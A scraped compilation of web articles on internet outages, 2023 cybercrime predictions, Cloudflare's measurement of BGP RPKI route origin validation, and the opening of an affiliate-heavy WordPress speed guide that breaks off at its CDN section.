Verizon had a major internet outage in January 2021, which disrupted tens of thousands of customers along the East Coast.

While the internet outage lasted only about an hour, Verizon experienced a sharp drop in traffic volume. Naturally, many customers complained about the loss of service. 

At first, the company reported the incident was the result of someone cutting fiber cables. However, it was unrelated and turned out to be a “software issue” during routine network maintenance activities. 

8. Microsoft 

Another major internet outage occurred at Microsoft when its Azure service went under in December 2021. Azure’s Active Directory service crashed for about ninety minutes. 

Compared to some other outages, this one was relatively small. Nonetheless, it prevented users from signing in to Microsoft services such as Office 365. Although applications remained online, users couldn’t access them, making this a major productivity killer for many organizations worldwide.

9. Comcast

There was an internet outage at Comcast in November 2021, which happened when its San Francisco backbone shut down for about two hours.

Following the outage, a broader issue occurred, spanning multiple U.S. cities, including hubs like Philadelphia and Chicago. Several thousand customers lost service, leaving them unable to access basic network functionality during the height of the pandemic. 

10. Akamai Edge DNS

Akamai, a global content delivery provider, experienced an outage with its DNS service in 2021. The Akamai outage resulted from a faulty software configuration update activating a bug in its Secure Edge Content Delivery Network. 

In a similar fashion to other attacks against service providers, Akamai’s outage caused widespread damage. Other websites—including American Airlines, Fox News, and Steam—all experienced performance issues following the incident.

11. Cox Communications

Cox Communications reported a major internet outage in March 2022, impacting nearly seven thousand customers in the Las Vegas region. 

The problem resulted from an NV Energy backhoe damaging a transmission line and triggering a power event. The surge caused a cable modem to reset, and many customers tried to reconnect simultaneously. As a result, it took several hours for service to resume. 

12.  Slack

The recent Slack outage in  January 2021 created havoc for distributed workers who rely on the platform for communication and collaboration. 

The platform’s outage impacted organizations across the US, UK, Germany, Japan, and India, with interruptions occurring for about two and a half hours. Slack says the issue came from scaling problems on the AWS Transit Gateway, which couldn’t accommodate a spike in traffic. 

Best Practices for Avoiding Internet Outages

At the end of the day, there’s nothing you can do to prevent outages entirely, especially if your business relies on multiple third-party systems. Eventually, your company or a partner will experience some level of service disruption.   It’s best to plan for them and, where possible, enable systems to ‘fail gracefully.’ 

As part of your resiliency planning, here are some steps to mitigate damage, maximize uptime, and keep your organization safe, along with some best practices to help you avoid disruptions from network and connectivity issues. 

Set Up a Backup Internet Solution

It’s impossible to protect your business from local internet outages completely. They can stem from issues like local construction, service disruptions, and more. 

Consider setting up a backup internet solution as a workaround, so you never lose connectivity. For example, you may choose to combine broadband with a wireless failover solution.

Consider a Multi-Cloud Strategy

If your business is in the cloud, it’s a good idea to explore a multi-cloud strategy. By spreading your workloads across multiple cloud providers, you can prevent cloud service disruptions from knocking your digital applications offline. This approach can also improve uptime and resiliency.

Use Website Performance and Availability Monitoring

One of the best ways to protect your business is to use website performance and availability monitoring. It provides real-time visibility into how end users are interacting with and experiencing your website.

A robust website performance and availability monitoring solution can provide actionable insights into the health and stability of your website. As a result, you can track uptime and performance over time and troubleshoot issues when they occur.

The Pingdom Approach to Website Performance Monitoring

SolarWinds® Pingdom® provides real-time and historical end-user experience monitoring, giving your team deep visibility from a single pane of glass. With Pingdom, it’s possible to protect against the kind of outages helping your company make headlines for the wrong reasons.

When you’re ready to jump in, try Pingdom by requesting a free trial today

This post was written by Justin Reynolds. Justin is a freelance writer who enjoys telling stories about how technology, science, and creativity can help workers be more productive. In his spare time, he likes seeing or playing live music, hiking, and traveling.

Source :
https://www.pingdom.com/outages/internet-outages-the-12-most-impactful/

Cybercrime (and Security) Predictions for 2023

Threat actors continue to adapt to the latest technologies, practices, and even data privacy laws—and it’s up to organizations to stay one step ahead by implementing strong cybersecurity measures and programs.

Here’s a look at how cybercrime will evolve in 2023 and what you can do to secure and protect your organization in the year ahead.

Increase in digital supply chain attacks #

With the rapid modernization and digitization of supply chains come new security risks. Gartner predicts that by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains—this is a three-fold increase from 2021. Previously, these types of attacks weren’t even likely to happen because supply chains weren’t connected to the internet. But now that they are, supply chains need to be secured properly.

The introduction of new technology around software supply chains means there are likely security holes that have yet to be identified, but are essential to uncover in order to protect your organization in 2023.

If you’ve introduced new software supply chains to your technology stack, or plan to do so sometime in the next year, then you must integrate updated cybersecurity configurations. Employ people and processes that have experience with digital supply chains to ensure that security measures are implemented correctly.

Mobile-specific cyber threats are on-the-rise#

It should come as no surprise that with the increased use of smartphones in the workplace, mobile devices are becoming a greater target for cyber-attack. In fact, cyber-crimes involving mobile devices have increased by 22% in the last year, according to the Verizon Mobile Security Index (MSI) 2022 with no signs of slowing down in advance of the new year.

As hackers hone in on mobile devices, SMS-based authentication has inevitably become less secure. Even the seemingly most secure companies can be vulnerable to mobile device hacks. Case in point, several major companies, including Uber and Okta were impacted by security breaches involving one-time passcodes in the past year alone.

This calls for the need to move away from relying on SMS-based authentication, and instead to multifactor authentication (MFA) that is more secure. This could include an authenticator app that uses time-sensitive tokens, or more direct authenticators that are hardware or device-based.

Organizations need to take extra precautions to prevent attacks that begin with the frontline by implementing software that helps verify user identity. According to the World Economic Forum’s 2022 Global Risks Report, 95% of cybersecurity incidents are due to human error. This fact alone emphasizes the need for a software procedure that decreases the chance of human error when it comes to verification. Implementing a tool like Specops’ Secure Service Desk helps reduce vulnerabilities from socially engineered attacks that are targeting the help desk, enabling a secure user verification at the service desk without the risk of human error.

Double down on cloud security #

As more companies opt for cloud-based activities, cloud security—any technology, policy, or service that protects information stored in the cloud—should be a top priority in 2023 and beyond. Cyber criminals become more sophisticated and evolve their tactics as technologies evolve, which means cloud security is essential as you rely on it more frequently in your organization.

The most reliable safeguard against cloud-based cybercrime is a zero trust philosophy. The main principle behind zero trust is to automatically verify everything—and essentially not trust anyone without some type of authorization or inspection. This security measure is critical when it comes to protecting data and infrastructure stored in the cloud from threats.

Ransomware-as-a-Service is here to stay #

Ransomware attacks continue to increase at an alarming rate. Data from Verizon discovered a 13% increase in ransomware breaches year-over-year. Ransomware attacks have also become increasingly targeted — sectors such as healthcare and food and agriculture are just the latest industries to be victims, according to the FBI.

With the rise in ransomware threats comes the increased use of Ransomware-as-a-Service (RaaS). This growing phenomenon is when ransomware criminals lease out their infrastructure to other cybercriminals or groups. RaaS kits make it even easier for threat actors to deploy their attacks quickly and affordably, which is a dangerous combination to combat for anyone leading the cybersecurity protocols and procedures. To increase protection against threat actors who use RaaS, enlist the help of your end-users.

End-users are your organization’s frontline against ransomware attacks, but they need the proper training to ensure they’re protected. Make sure your cybersecurity procedures are clearly documented and regularly practiced so users can stay aware and vigilant against security breaches. Employing backup measures like password policy software, MFA whenever possible, and email-security tools in your organization can also mitigate the onus on end-user cybersecurity.

Data privacy laws are getting stricter—get ready #

We can’t talk about cybersecurity in 2023 without mentioning data privacy laws. With new data privacy laws set to go into effect in several states over the next year, now is the time to assess your current procedures and systems to make sure they comply. These new state-specific laws are just the beginning; companies would be wise to review their compliance as more states are likely to develop new privacy laws in the years to come.

Data privacy laws often require changes to how companies store and processing data, and implementing these new changes might open you up to additional risk if they are not implemented carefully. Ensure your organization is in adherence to proper cyber security protocols, including zero trust, as mentioned above.

Source :
https://thehackernews.com/2022/12/cybercrime-and-security-predictions-for.html

Helping build a safer Internet by measuring BGP RPKI Route Origin Validation

The Border Gateway Protocol (BGP) is the glue that keeps the entire Internet together. However, despite its vital function, BGP wasn’t originally designed to protect against malicious actors or routing mishaps. It has since been updated to account for this shortcoming with the Resource Public Key Infrastructure (RPKI) framework, but can we declare it to be safe yet?

If the question needs asking, you might suspect we can’t. There is a shortage of reliable data on how much of the Internet is protected from preventable routing problems. Today, we’re releasing a new method to measure exactly that: what percentage of Internet users are protected by their Internet Service Provider from these issues. We find that there is a long way to go before the Internet is protected from routing problems, though it varies dramatically by country.

Why RPKI is necessary to secure Internet routing

The Internet is a network of independently-managed networks, called Autonomous Systems (ASes). To achieve global reachability, ASes interconnect with each other and determine the feasible paths to a given destination IP address by exchanging routing information using BGP. BGP enables routers with only local network visibility to construct end-to-end paths based on the arbitrary preferences of each administrative entity that operates that equipment. Typically, Internet traffic between a user and a destination traverses multiple AS networks using paths constructed by BGP routers.

BGP, however, lacks built-in security mechanisms to protect the integrity of the exchanged routing information and to provide authentication and authorization of the advertised IP address space. Because of this, AS operators must implicitly trust that the routing information exchanged through BGP is accurate. As a result, the Internet is vulnerable to the injection of bogus routing information, which cannot be mitigated by security measures at the client or server level of the network.

An adversary with access to a BGP router can inject fraudulent routes into the routing system, which can be used to execute an array of attacks, including:

  • Denial-of-Service (DoS) through traffic blackholing or redirection,
  • Impersonation attacks to eavesdrop on communications,
  • Machine-in-the-Middle exploits to modify the exchanged data, and subvert reputation-based filtering systems.

Additionally, local misconfigurations and fat-finger errors can be propagated well beyond the source of the error and cause major disruption across the Internet.

Such an incident happened on June 24, 2019. Millions of users were unable to access Cloudflare address space when a regional ISP in Pennsylvania accidentally advertised routes to Cloudflare through their capacity-limited network. This was effectively the Internet equivalent of routing an entire freeway through a neighborhood street.

Traffic misdirections like these, either unintentional or intentional, are not uncommon. The Internet Society’s MANRS (Mutually Agreed Norms for Routing Security) initiative estimated that in 2020 alone there were over 3,000 route leaks and hijacks, and new occurrences can be observed every day through Cloudflare Radar.

The most prominent proposals to secure BGP routing, standardized by the IETF focus on validating the origin of the advertised routes using Resource Public Key Infrastructure (RPKI) and verifying the integrity of the paths with BGPsec. Specifically, RPKI (defined in RFC 7115) relies on a Public Key Infrastructure to validate that an AS advertising a route to a destination (an IP address space) is the legitimate owner of those IP addresses.

RPKI has been defined for a long time but lacks adoption. It requires network operators to cryptographically sign their prefixes, and routing networks to perform an RPKI Route Origin Validation (ROV) on their routers. This is a two-step operation that requires coordination and participation from many actors to be effective.

The two phases of RPKI adoption: signing origins and validating origins

RPKI has two phases of deployment: first, an AS that wants to protect its own IP prefixes can cryptographically sign Route Origin Authorization (ROA) records thereby attesting to be the legitimate origin of that signed IP space. Second, an AS can avoid selecting invalid routes by performing Route Origin Validation (ROV, defined in RFC 6483).

With ROV, a BGP route received by a neighbor is validated against the available RPKI records. A route that is valid or missing from RPKI is selected, while a route with RPKI records found to be invalid is typically rejected, thus preventing the use and propagation of hijacked and misconfigured routes.

One issue with RPKI is the fact that implementing ROA is meaningful only if other ASes implement ROV, and vice versa. Therefore, securing BGP routing requires a united effort and a lack of broader adoption disincentivizes ASes from commiting the resources to validate their own routes. Conversely, increasing RPKI adoption can lead to network effects and accelerate RPKI deployment. Projects like MANRS and Cloudflare’s isbgpsafeyet.com are promoting good Internet citizenship among network operators, and make the benefits of RPKI deployment known to the Internet. You can check whether your own ISP is being a good Internet citizen by testing it on isbgpsafeyet.com.

Measuring the extent to which both ROA (signing of addresses by the network that controls them) and ROV (filtering of invalid routes by ISPs) have been implemented is important to evaluating the impact of these initiatives, developing situational awareness, and predicting the impact of future misconfigurations or attacks.

Measuring ROAs is straightforward since ROA data is readily available from RPKI repositories. Querying RPKI repositories for publicly routed IP prefixes (e.g. prefixes visible in the RouteViews and RIPE RIS routing tables) allows us to estimate the percentage of addresses covered by ROA objects. Currently, there are 393,344 IPv4 and 86,306 IPv6 ROAs in the global RPKI system, covering about 40% of the globally routed prefix-AS origin pairs1.

Measuring ROV, however, is significantly more challenging given it is configured inside the BGP routers of each AS, not accessible by anyone other than each router’s administrator.

Measuring ROV deployment

Although we do not have direct access to the configuration of everyone’s BGP routers, it is possible to infer the use of ROV by comparing the reachability of RPKI-valid and RPKI-invalid prefixes from measurement points within an AS2.

Consider the following toy topology as an example, where an RPKI-invalid origin is advertised through AS0 to AS1 and AS2. If AS1 filters and rejects RPKI-invalid routes, a user behind AS1 would not be able to connect to that origin. By contrast, if AS2 does not reject RPKI invalids, a user behind AS2 would be able to connect to that origin.

While occasionally a user may be unable to access an origin due to transient network issues, if multiple users act as vantage points for a measurement system, we would be able to collect a large number of data points to infer which ASes deploy ROV.

If, in the figure above, AS0 filters invalid RPKI routes, then vantage points in both AS1 and AS2 would be unable to connect to the RPKI-invalid origin, making it hard to distinguish if ROV is deployed at the ASes of our vantage points or in an AS along the path. One way to mitigate this limitation is to announce the RPKI-invalid origin from multiple locations from an anycast network taking advantage of its direct interconnections to the measurement vantage points as shown in the figure below. As a result, an AS that does not itself deploy ROV is less likely to observe the benefits of upstream ASes using ROV, and we would be able to accurately infer ROV deployment per AS3.

Note that it’s also important that the IP address of the RPKI-invalid origin should not be covered by a less specific prefix for which there is a valid or unknown RPKI route, otherwise even if an AS filters invalid RPKI routes its users would still be able to find a route to that IP.

The measurement technique described here is the one implemented by Cloudflare’s isbgpsafeyet.com website, allowing end users to assess whether or not their ISPs have deployed BGP ROV.

The isbgpsafeyet.com website itself doesn’t submit any data back to Cloudflare, but recently we started measuring whether end users’ browsers can successfully connect to invalid RPKI origins when ROV is present. We use the same mechanism as is used for global performance data4. In particular, every measurement session (an individual end user at some point in time) attempts a request to both valid.rpki.cloudflare.com, which should always succeed as it’s RPKI-valid, and invalid.rpki.cloudflare.com, which is RPKI-invalid and should fail when the user’s ISP uses ROV.

This allows us to have continuous and up-to-date measurements from hundreds of thousands of browsers on a daily basis, and develop a greater understanding of the state of ROV deployment.

The state of global ROV deployment

The figure below shows the raw number of ROV probe requests per hour during October 2022 to valid.rpki.cloudflare.com and invalid.rpki.cloudflare.com. In total, we observed 69.7 million successful probes from 41,531 ASNs.

Based on APNIC’s estimates on the number of end users per ASN, our weighted5 analysis covers 96.5% of the world’s Internet population. As expected, the number of requests follow a diurnal pattern which reflects established user behavior in daily and weekly Internet activity6.

We can also see that the number of successful requests to valid.rpki.cloudflare.com (gray line) closely follows the number of sessions that issued at least one request (blue line), which works as a smoke test for the correctness of our measurements.

As we don’t store the IP addresses that contribute measurements, we don’t have any way to count individual clients and large spikes in the data may introduce unwanted bias. We account for that by capturing those instants and excluding them.

Overall, we estimate that out of the four billion Internet users, only 261 million (6.5%) are protected by BGP Route Origin Validation, but the true state of global ROV deployment is more subtle than this.

The following map shows the fraction of dropped RPKI-invalid requests from ASes with over 200 probes over the month of October. It depicts how far along each country is in adopting ROV but doesn’t necessarily represent the fraction of protected users in each country, as we will discover.

Sweden and Bolivia appear to be the countries with the highest level of adoption (over 80%), while only a few other countries have crossed the 50% mark (e.g. Finland, Denmark, Chad, Greece, the United States).

ROV adoption may be driven by a few ASes hosting large user populations, or by many ASes hosting small user populations. To understand such disparities, the map below plots the contrast between overall adoption in a country (as in the previous map) and median adoption over the individual ASes within that country. Countries with stronger reds have relatively few ASes deploying ROV with high impact, while countries with stronger blues have more ASes deploying ROV but with lower impact per AS.

In the Netherlands, Denmark, Switzerland, or the United States, adoption appears mostly driven by their larger ASes, while in Greece or Yemen it’s the smaller ones that are adopting ROV.

The following histogram summarizes the worldwide level of adoption for the 6,765 ASes covered by the previous two maps.

Most ASes either don’t validate at all, or have close to 100% adoption, which is what we’d intuitively expect. However, it’s interesting to observe that there are small numbers of ASes all across the scale. ASes that exhibit partial RPKI-invalid drop rate compared to total requests may either implement ROV partially (on some, but not all, of their BGP routers), or appear as dropping RPKI invalids due to ROV deployment by other ASes in their upstream path.

To estimate the number of users protected by ROV we only considered ASes with an observed adoption above 95%, as an AS with an incomplete deployment still leaves its users vulnerable to route leaks from its BGP peers.

If we take the previous histogram and summarize by the number of users behind each AS, the green bar on the right corresponds to the 261 million users currently protected by ROV according to the above criteria (686 ASes).

Looking back at the country adoption map one would perhaps expect the number of protected users to be larger. But worldwide ROV deployment is still mostly partial, lacking larger ASes, or both. This becomes even more clear when compared with the next map, plotting just the fraction of fully protected users.

To wrap up our analysis, we look at two world economies chosen for their contrasting, almost symmetrical, stages of deployment: the United States and the European Union.

112 million Internet users are protected by 111 ASes from the United States with comprehensive ROV deployments. Conversely, more than twice as many ASes from countries making up the European Union have fully deployed ROV, but end up covering only half as many users. This can be reasonably explained by end user ASes being more likely to operate within a single country rather than span multiple countries.

Conclusion

Probe requests were performed from end user browsers and very few measurements were collected from transit providers (which have few end users, if any). Also, paths between end user ASes and Cloudflare are often very short (a nice outcome of our extensive peering) and don’t traverse upper-tier networks that they would otherwise use to reach the rest of the Internet.

In other words, the methodology used focuses on ROV adoption by end user networks (e.g. ISPs) and isn’t meant to reflect the eventual effect of indirect validation from (perhaps validating) upper-tier transit networks. While indirect validation may limit the “blast radius” of (malicious or accidental) route leaks, it still leaves non-validating ASes vulnerable to leaks coming from their peers.

As with indirect validation, an AS remains vulnerable until its ROV deployment reaches a sufficient level of completion. We chose to only consider AS deployments above 95% as truly comprehensive, and Cloudflare Radar will soon begin using this threshold to track ROV adoption worldwide, as part of our mission to help build a better Internet.

When considering only comprehensive ROV deployments, some countries such as Denmark, Greece, Switzerland, Sweden, or Australia, already show an effective coverage above 50% of their respective Internet populations, with others like the Netherlands or the United States slightly above 40%, mostly driven by few large ASes rather than many smaller ones.

Worldwide we observe a very low effective coverage of just 6.5% over the measured ASes, corresponding to 261 million end users currently safe from (malicious and accidental) route leaks, which means there’s still a long way to go before we can declare BGP to be safe.

……
1https://rpki.cloudflare.com/
2Gilad, Yossi, Avichai Cohen, Amir Herzberg, Michael Schapira, and Haya Shulman. “Are we there yet? On RPKI’s deployment and security.” Cryptology ePrint Archive (2016).
3Geoff Huston. “Measuring ROAs and ROV”. https://blog.apnic.net/2021/03/24/measuring-roas-and-rov/
4Measurements are issued stochastically when users encounter 1xxx error pages from default (non-customer) configurations.
5Probe requests are weighted by AS size as calculated from Cloudflare’s worldwide HTTP traffic.
6Quan, Lin, John Heidemann, and Yuri Pradkin. “When the Internet sleeps: Correlating diurnal networks with external factors.” In Proceedings of the 2014 Conference on Internet Measurement Conference, pp. 87-100. 2014.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/rpki-updates-data/

25 Ways To Fix A Slow WordPress Site And Pass Core Web Vitals: 2022 Advanced Guide

Welcome to the most complete guide on WordPress speed optimization!

This is my attempt to sum up WordPress speed + core web vitals in 1 post (it’s loooong).

I’ve constantly updated it to reflect new changes ever since I first published this 10 years ago. You have updates to things like core web vitals, plugin changelogs, and Cloudflare Enterprise happening every day. While site speed has gotten complex, the basics have stayed the same: use lightweight themes/plugins on fast servers (ideally with a performant cache plugin/CDN).

Why this tutorial is different:

First, my recommendations on tools/plugins/services are arguably better than what other people tell you to use. I’m very transparent about SiteGround’s slow TTFB and cache plugin, Kinsta’s overpriced service + lack of resources, NitroPack being blackhat, RocketCDN’s poor performance, and Elementor/Divi being slow. I’ve also written extensive reviews/tutorials on nearly every major host, cache plugin, CDN, and core web vital you can find in my nav menu.

Which is the 2nd reason it’s different: configuration guides! I have tons of them. Need help configuring FlyingPressLiteSpeed Cache, or Perfmatters? Want to improve TTFB or LCP? Or maybe you’re wondering which Cloudflare settings to use. I have detailed guides on all those.

If you have suggestions on making this tutorial better (or you have a question), drop me a comment. I’m all ears. I’m not for hire because I spend so much time writing these guides 🙂

Good luck and fair seas!

  1. Testing Tools
  2. DNS
  3. Hosting
  4. Page Builders
  5. CDN
  6. Cache Plugins
  7. Other Caching
  8. Plugins
  9. CSS + JavaScript
  10. Third-Party Code
  11. Fonts
  12. Images
  13. Videos
  14. Comments
  15. LCP
  16. CLS
  17. Preload, Prefetch, Preconnect
  18. Database
  19. Background Tasks
  20. Mobile
  21. WooCommerce
  22. Security
  23. PHP Version
  24. Make Sure Optimizations Are Working
  25. Speed Plugins
  26. Get Help
  27. My Setup

1. Testing Tools

Find bottlenecks on your site before jumping in.

  • Chrome Dev Tools – the coverage report shows your largest CSS/JS files and where they’re loaded from (plugins + third-party code are common culprits). So many parts of speed and web vitals are related to CSS/JS and it’s best to tackle it at the source. Removing things you don’t need is better than trying to optimize it.
  • KeyCDN Performance Test  – measure TTFB in 10 global locations. This is mainly improved with better hosting and using a performant CDN with full page caching (like APO or FlyingProxy). It also shows DNS lookup times and TLS which can be improved with a fast DNS (i.e. Cloudflare) and configuring their SSL/TLS settings.
  • PageSpeed Insights – most items come down to reducing or optimizing CSS, JS, fonts, images, TTFB, and above the fold content. For example, preload your LCP image and exclude it from lazy load, then move large plugins/elements below the fold so they can be delayed. Focus on recommendations in PSI’s opportunities + diagnostics sections, and monitor your core web vitals report in Search Console.
  • CLS Debugger – see your website’s layout shifts (CLS) on mobile/desktop in a GIF.
  • WP Hive – Chrome extension that lets you search the WordPress plugin repository and see whether a plugin impacts memory usage and PageSpeed scores, but only measures “out of the box settings” and not when content is added to the frontend.
  • Wordfence Live Traffic Report – see bots hitting your site in real-time. AhrefsBot, SemrushBot, compute.amazonaws.com and other bots can be blocked if you’re using their service. Since most bot protection services don’t block these service’s bots, you’ll need to do this manually with something like Cloudflare firewall rules.
  • WP-Optimize – see which plugins add database overhead and remove old tables left behind by plugins/themes you deleted. Does a better than job cache plugins with scheduled cleanups because it can keep a certain number of post revisions while removing junk (cache plugins delete them all, leaving you with no backups).
  • cdnperf.com + dnsperf.com – you can these as baseline for choosing a DNS/CDN provider, but it doesn’t include StackPath’s CDN (removed from cdnperf and used by RocketCDN), QUIC.cloud’s CDN or CDN (used on LiteSpeed), and other services.
  • Waterfall Charts – testing “scores” isn’t nearly as effective as measuring things in a Waterfall chart. Google’s video on optimizing LCP is a great resource and shows you the basics. You can find one in WebPageTest, Chrome Dev Tools, and GTmetrix.
  • Diagnostic Plugins –  the speed plugins section lists all plugins mentioned in the guide. It includes diagnostic plugins like Query Monitor (this is probably best for finding bottlenecks), WP Server Stats, WP Hosting Benchmark, and WP Crontrol.

2. DNS

A slow DNS causes latency which is part of TTFB (and TTFB is part of LCP).

Whoever you registered your domain through is who you’re using for a DNS. GoDaddy, NameCheap, and even Amazon Route 53 (used on Kinsta) don’t perform well on dnsperf.com. Better options include Cloudflare, QUIC.cloud, or Google (if using Google Domains). I usually recommend Cloudflare since it’s free and can be used on any setup by changing nameservers.

Cloudflare dns

3. Hosting

Rocket.net with their free Cloudflare Enterprise will outperform any “mainstream host” since you get 32 CPU cores + 128GB RAM, NVMe storage, Redis, and Cloudflare’s full page caching + Argo Smart Routing. I use them and average a <150ms global TTFB (or click through my posts).

12 things to know about hosting/TTFB

  1. Hosting is the #1 factor of site speed.
  2. TTFB is a key indicator of hosting performance.
  3. TTFB is part of core web vitals and is 40% of LCP.
  4. TTFB also affects INP (since latency is part of TTFB).
  5. SpeedVitals tests TTFB in 35 locations – use this tool!
  6. Test your site 3 times to get accurate numbers in SpeedVitals.
  7. Doing this ensures your caching and CDN are working properly.
  8. Check your average TTFB worldwide in your 3rd SpeedVitals test.
  9. Google flags your TTFB if it’s over 600ms, but under 200ms is better.
  10. PageSpeed Insights (and other testing tools) only test TTFB in 1 location.
  11. WP Hosting Benchmark also tests hosting performance (here are my results).
  12. Combining a good host/CDN is arguably the best way to improve TTFB (using a host with improved specs on top of Cloudflare Enterprise hits 2 birds with 1 stone).
Omm ttfb speedvitals 1

Mainstream hosts (like SiteGround, Hostinger, and WPX) don’t have a lot of CPU/RAM, use slower SATA SSDs, and are shared hosting with strict CPU limits which force you to upgrade plans. Cloud hosting is faster, but Kinsta still uses SATA SSDs with low CPU/RAM, PHP workers, and monthly visits (Redis also costs $100/month). Cloudways Vultr HF is who I previously used, but again, they start with only 1 CPU + 1GB RAM on slower Apache servers, PHP-FPM, and GZIP.

Here are Rocket.net’s:

All plans use 32 CPU cores + 128GB RAM with NVMe (faster than SATA), Redis (better than memcached), LiteSpeed’s PHP, and Brotli (smaller compression than GZIP). They have no PHP worker limits since only about 10% of traffic hits your origin due to their Cloudflare Enterprise.

SiteGroundHostingerKinstaCloudways Vultr HFRocket.net
Hosting typeSharedSharedCloudCloudPrivate cloud
StorageSATASATASATANVMeNVMe
CPU coresNot listed1-212132
RAM (GB)Not listed.768 – 1.53681128
Object cacheMemcachedxRedis ($100/mo)Redis (Pro)Redis
ServerNginxLiteSpeedNginxApacheNginx
PHP processingFastCGILiteSpeedFastCGIFPMLiteSpeed
CompressionBrotliBrotliBrotliGZIPBrotli
CPU limitsVery commonLow memoryLow PHP workersAverageNone

 
Why you need Cloudflare Enterprise

Because you get Enterprise features like 270+ PoPs, prioritized routing, full page caching, HTTP/3, WAF, and image optimization. 3 problems with most CDNs are their small network (PoPs) and no full page caching or image optimization. For example, WP Rocket’s RocketCDN uses StackPath which was removed from cdnperf.com and doesn’t include image optimization with a mediocre Tbps speed of 65+. SiteGround’s CDN only has 14 PoPs. QUIC.cloud CDN (for LiteSpeed) and BunnyCDN are good, but they still don’t beat Cloudflare Enterprise. Sure, you can pay $5/mo for Cloudflare’s APO, but you’re still missing out on all other Enterprise features.

3 popular hosts with Cloudflare Enterprise

Rocket.net’s Cloudflare Enterprise is free, setup automatically, and uses full page caching (unlike Cloudways). And unlike Kinsta’s, Rocket.net has Argo Smart Routing (specifically good for WooCommerce sites), load balancing, and image optimization. Rocket.net CEO Ben Gabler also used to be StackPath’s Chief Product Officer and went as far as building Rocket.net’s data centers in the same locations as Cloudflare’s. And unlike both hosts, Rocket.net doesn’t limit PHP workers (there’s no CPU limits) and monthly visit limits are 10-25 times more than Kinsta’s.

Cloudflare Enterprise (Kinsta)Cloudflare Enterprise (Cloudways)Cloudflare Enterprise (Rocket.net)
CDN PoPs270270270
Prioritized routing
Full page cachingx
HTTP/3
WAF
Argo smart routingx
Load balancingx
Image optimizationx
Automatic configurationxx
PriceFree$5/mo (1 domain)Free

 
Problems with mainstream hosts

I’ve written some pretty bad reviews about SiteGround’s slow TTFB, CPU limits, and why SG Optimizer does a poor job with core web vitals (they also control several Facebook Groups and threaten to sue people who write bad reviews). Hostinger writes fake reviews and is only cheap because you get less resources like CPU/RAM. Kinsta and WP Engine are way too expensive for how many resources, PHP workers, and monthly visits you get. Along with major incidents like WPX’s worldwide outage and SiteGround’s DNS getting blocked by Google for 4 days (both WPX and SiteGround denied responsibility). One thing is clear: most mainstream hosts appear to be more interested in profits than performance. Please do your own research before getting advice.

Getting started on Rocket.net

Step 1: Create a Rocket.net account and you’ll be prompted to add a coupon. Sign up with coupon OMM1 to get your first month for $1 (renews at $30/mo or $25/mo when paying yearly). If you sign up with my coupon or affiliate links, I get a commission which I seriously appreciate.

Rocket. Net omm1 coupon

Step 2: Request a free migration. They did this the same day and let me review my website before it was launched with no downtime. For the record, their support is better than Kinsta’s and you can reach out to Ben Gabler or his team (via phone/chat/email) if you have questions.

Step 3: Upgrade to PHP 8.1 and ask support to install Redis (they use Redis Object Cache). These are the only things I did since Cloudflare Enterprise and backups are both automatic.

Step 4: Retest your TTFB in SpeedVitals and click through your pages to see the difference. You can also search their TrustPilot profile for people mentioning “TTFB” where they’re rated 4.9/5.

Kinsta to rocket. Net migration
Moved to rocket. Net vs siteground
Rocket. Net positive review
Rocket. Net facebook review 1
Rocket. Net vs kinsta
Kinsta to rocket. Net ttfb redis
https://youtube.com/watch?v=AT3LycPIR2E%3Fautoplay%3D1
Namehero cloudways rocket. Net
I agree with this for the most part

I was previously on Cloudways Vultr HF which was great, but their Cloudflare Enterprise doesn’t use full page caching (yet) and is $5/mo with annoying challenge pages. Even if their Cloudflare Enterprise was identical, Rocket.net still outperforms them with better specs like more CPU/RAM, Brotli, and LiteSpeed’s PHP (plus better support, easier to use, and usually pricing). While Cloudways is a big improvement than most hosts, you’re already spending $18/mo for Vultr HF’s lowest 1 CPU plan with Cloudflare Enterprise. At that point, the extra $7/mo you’d be spending at Rocket.net is worth it. Rocket.net’s dashboard is also much easier.

For small sites on a budget, NameHero’s Turbo Cloud plan is similar to Hostinger between LiteSpeed, cPanel, and pricing. However, NameHero’s Turbo Cloud plan has about 1.5x more resources (3 CPU + 3GB RAM) with NVMe storage. NameHero’s support/uptimes are also better shown in TrustPilot reviews. This is one the fastest setups on a budget… you get a LiteSpeed server + LiteSpeed Cache + QUIC.cloud CDN, and email hosting. The main con is their data centers are only in the US and Netherlands. If these aren’t close to your visitors, make sure to setup QUIC.cloud’s CDN which has HTML caching (ideally the paid plan which uses all 70 PoPs).

Cpu cores on litespeed hosting plans
Litespeed cache litespeed server
Ram on litespeed hosting plans
Namehero vs siteground feedback

4. Page Builders

Elementor/Divi are slower than Gutenberg/Oxygen.

Since multiple PSI items are related to CSS/JS/fonts, many people are replacing them with lightweight alternatives. The last thing you want to do is use a slow page builder then install a bunch of “extra functionality plugins” which add even more CSS/JS. Don’t fall into this trap. If you don’t want to ditch your page builder completely, there are still ways you can optimize it.

  • Divi/Elementor add extra CSS/JS/fonts to your site.
  • Adding more page builder plugins can slow it down more.
  • GeneratePress (what I use), Kadence, Blocksy, Oxygen are faster.
  • If using Elementor, try the settings under Elementor → Experiments.
  • Same thing with Divi (Divi → Theme Options → General → Performance).
  • If using Astra Starter Sites, use a template built in Gutenberg (not Elementor).
  • Use CSS for your header/footer/sidebar (instead of bloated page builder code).
  • Elementor has a theme customizer setting to host fonts locally + preload them.
  • If you don’t use Elementor font icons, disable them or use custom icons instead.
  • If you don’t use elementor-dialog.js for popups, disable it (i.e. using Perfmatters).
  • Many page builder plugins are module-based, so disable modules you don’t use.
  • Simplify your design by using less widgets/columns (here’s a YouTube video on it).
  • If you preload critical images in FlyingPress or Perfmatters, this excludes above the fold images from lazy load and preloads them to improve LCP. However, it doesn’t work with Elementor image widgets (go through your page builder + cache plugin documentation).
  • Background images aren’t lazy loaded by default because they’re loaded from a separate CSS file. Some cache plugins support a lazy-bg class you can use to lazy load backgrounds.
  • WP Johnny offers page builder removal services but he’s expensive and usually a busy guy.
Fastest wordpress themes
View test
Elementor css
Use the coverage report to find page builder plugins adding CSS/JS

5. CDN

Have a slow TTFB in KeyCDN’s performance test?

A performant CDN with HTML caching (and other CDN features) can be the difference maker. While cdnperf.com is a good baseline, there are other things to consider.

